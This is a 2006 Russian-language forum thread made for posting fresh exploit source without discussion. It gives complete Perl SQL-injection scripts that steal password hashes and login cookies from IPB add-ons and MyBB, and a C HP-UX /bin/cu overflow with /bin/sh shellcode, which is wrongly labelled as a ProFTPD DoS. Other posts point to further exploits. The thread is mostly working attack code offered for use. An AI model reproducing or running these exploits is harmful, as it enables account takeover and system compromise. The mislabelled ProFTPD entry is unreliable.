day & night

Exploits, Постим эксплойты
Дата обновления: , перейти к новому сообщению
icon13
#1
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Тема создана для того, что-бы закидывать сюда исходники свежих сплойтов!
Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники,

Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4)

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Сплойт:

» Exploit «
User is offline
Go topGo end

Ответов(1 - 9)
8.03.2006 - 23:52
#2
PRYANIK



Made In Tula
[SoftoRooMTeaM] Group Icon

Группа: Администраторы
Сообщений: 31.135
Регистрация: 22.02.2004
Пользователь №: 7


Респектов: 6387
-----XXXXX




D2-Shoutbox 4.2 (IPB Mod) SQL injection
#!/usr/bin/perl
#"Powered By D2-Shoutbox 4.2"
#########################################################
use IO::Socket;
$host = $ARGV[0];
$user = $ARGV[2];
$uid = $ARGV[3];
$pid = $ARGV[4];
$type = $ARGV[5];

sub type()
{
if($type==1){$row="password";}
if($type==2){$row="member_login_key";}
else{print "Just 1 Or 2\n";exit();}
$sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*";
$path = $ARGV[1].$sql;
}


sub header()
{
print q{
#######################################################################
### D2-Shoutbox 4.2 SQL injection Exploit ###
### Tested On D2-Shoutbox 4.2 And IPB 2.4 ###
### Created By SkOd, Sed Security Team ###
#######################################################################
sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)]
sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2
#######################################################################
}
}

sub sedsock()
{
$sedsock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n";
print $sedsock "GET $path HTTP/1.1\n";
print $sedsock "Host: $host\n";
print $sedsock "Accept: */*\n";
print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n";
print $sedsock "Connection: close\n\n";
while($res = <$sedsock>){
$res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n";
}
}

if(@ARGV < 6){
header();
}else{
type();
sedsock();
}


Invision Power Board Dragoran's Portal SQL injection

#!/usr/bin/perl
############################################
#"Portal 1.3 by Dragoran"
#########################################################

use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
# IPB Portal 1.3 SQL injection Get Hash Exploit #
# Tested on Invision Power Board 1.3.0 #
# created By SkOd. SED Security Team #
############################################################
ipbpro.pl [HOST] [PATH] [Target id]
ipbpro.pl www.host.com /forum/ 2
############################################################

print "[+]Connecting...\n";
};
exit;
}
$serv = $ARGV[0];
$serv =~ s/(http:\/\/)//eg;
$dir = $ARGV[1];
$id = $ARGV[2];

$inj = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$inj2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$inje=$inj;
print "[+]User ID: $id\n";
print "[+]MD5 Hash: ";
for ($i=1; $i<3; $i++)
{
if($i==2){
$inje=$inj2;
}
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $inje HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
$answer =~ s/width="(.*%)"//eg;
$answer =~ m/width="(.*?)"/ && print $1;
}
}


--------------------
Не работает ссылка? Пишите в теме, обновим :)! Link not working? Let us know in the comments, we'll fix it!


Трудно найти слова, когда действительно есть что сказать. Э.М. Ремарк
User is offline
Go topGo end
8.03.2006 - 23:53
#3
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Invision Power Board < 2.1.4 Password change SQL-Injection Exploit

Сплойт тут:
User is offline
Go topGo end
9.03.2006 - 7:32
#4
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2


Мужики, я думаю будет лучше присоединять сплоиты в атач! wink.gif
User is offline
Go topGo end
9.03.2006 - 8:33
#5
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




QUOTE
Мужики, я думаю будет лучше присоединять сплоиты в атач!

Думаю тоже wink.gif


phpRPC <= 0.7 commands execute exploit

Затронутые продукты:
MYPHPNUKE:myPHPNuke 1.8
SQUIRRELMAIL:squirrelmail 1.4
PUNBB:PunBB 1.2
PWSPHP:PwsPHP 1.2
MYBB:MyBB 1.0
EKINBOARD:EKINboard 1.0
FSCRIPTS:Fantastic News 2.1
WORDPRESS:Wordpress 2.0
TECASCRIPTS:Quirex 2.0
PERLBLOG:PerlBlog 1.08
PERLBLOG:PerlBlog 1.09
ARCHANGELMGT:Archangel Weblog 0.90
PHPRPC:phpRPC 0.7
TL4S:D3Jeeb Pro 3
CGICALENDAR:CGI Calendar 2.7
REYERO:DirectContact 3.0
LANSUITE:LanParty Intranet System 2.1
IGENUS:iGENUS Webmail 2.02
4HOMEPAGES:4images 1.7
ISSUEDEALER:Issue Dealer 0.9
JFACETS:JFacets 0.1
PARODIA:Parodia 6.2
NATHANLANDRY:n8cms 1.1
NATHANLANDRY:n8cms 1.2
FARSINEWS:FarsiNews 2.5
EJ3:EJ3 TOPo 2.2
SENDCARD:sendcard 3.3
STOREBOT:StoreBot 2002
STOREBOT:StoreBot 2005

Сплойт:

User is offline
Go topGo end
9.03.2006 - 9:02
#6
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Уязвимость в ProFTPD (exploit code)

ProFTPD - FTP демон для UNIX и UNIX-подобных операционных систем. Хотя этот FTP демон позиционируется как безопасный FTP сервер, уязвимость в защите демона дает возможность DoS атаки с помощью большого количества команд "неправильного" размера. Эксплоит код демонстрирует данную уязвимость ProFTPD.

Системы уязвимы:
ProFTPD version 1.2.0rc1
ProFTPD version 1.2.0rc2

Сплойт:

/* Copyright © 2001 Zorgon
* All Rights Reserved
* The copyright notice above does not evidence any
* actual or intended publication of such source code.
*
* HP-UX /bin/cu exploit.
* Tested on HP-UX 11.00
* [email protected] (http://www.nightbird.free.fr)
*
*/
#include
#include
#include
#include
#define LEN 9778
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200 /* it works for me */
u_char hppa_shellcode[] = /* K2 shellcode */
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
int
main(int argc , char **argv){
char buffer[LEN+8];
int i;
long retaddr = RET;
int offset = OFFSET;

if(argc>1) offset = atoi(argv[1]);
for (i=0;i *(long *)&buffer[i] = retaddr + offset;
for (i=0;i<(LEN-strlen(hppa_shellcode)-50);i++)
*(buffer+i) = HPPA_NOP;
memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
fprintf(stderr, "Copyright © 2001 Zorgon\n");
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));
execl("/bin/cu","cu","-l",buffer,0);
}
User is offline
Go topGo end
9.03.2006 - 22:23
#7
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Norton AntiVirus Crash by NAV.kill File

Отказ антивируса при сканировании определенных PE файлов.

Сплойт:
» Нажмите, для открытия спойлера «
User is offline
Go topGo end
10.03.2006 - 8:38
#8
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




MyBB Forum SQL Injection Exploit

Затронутые продукты:
PHPNUKE:phpNuke 7.8
MANTIS:Mantis 1.0
WORDPRESS:Wordpress 2.0
DELTASCRIPTS:PHP Classifieds 6.20
DOTPROJECT:dotproject 2.0
MYBB:MyBB 1.03

Сплойт:

#!/bin/env perl
#//------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#//
http://WwW.SoQoR.NeT #
#//------#

use LWP::Simple;
print "\n#####################################################";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n#
Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0
http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n#####################################################";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
if(!$1)
{
$prefix="mybb_";
}
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,username,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,password,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,

null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n[*] $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}

# WwW.SoQoR.NeT
User is offline
Go topGo end
11.03.2006 - 22:48
#9
ZaHack



Большой Брат
Group Icon

Группа: Заблокированные
Сообщений: 1.252
Регистрация: 24.01.2006
Из: Where The Eagles Fly
Пользователь №: 333


Респектов: 117
-----X----




Исходник известнейшего сплоита KAHT2!!. Для получения админских прав на win NT-family cистемах:
» Нажмите, для открытия спойлера «
User is offline
Go topGo end
15.03.2006 - 18:47
#10
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




QUOTE
сказали аха и все забили!

Нет, не забили smile.gif

Cerberus FTP Server 2.32 Denial of Service Exploit.

Exploit:
аттач в .тхт wink.gif




Присоединённые файлы
Присоединённый файл  Cerberus_FTP_Server_2.32_Denial_of_Service_Exploit.rar ( 1.04кб ) Кол-во скачиваний: 79
User is offline
Go topGo end

Topic Options
Сейчас: 28.03.2024 - 14:30
Мобильная версия | Lite версия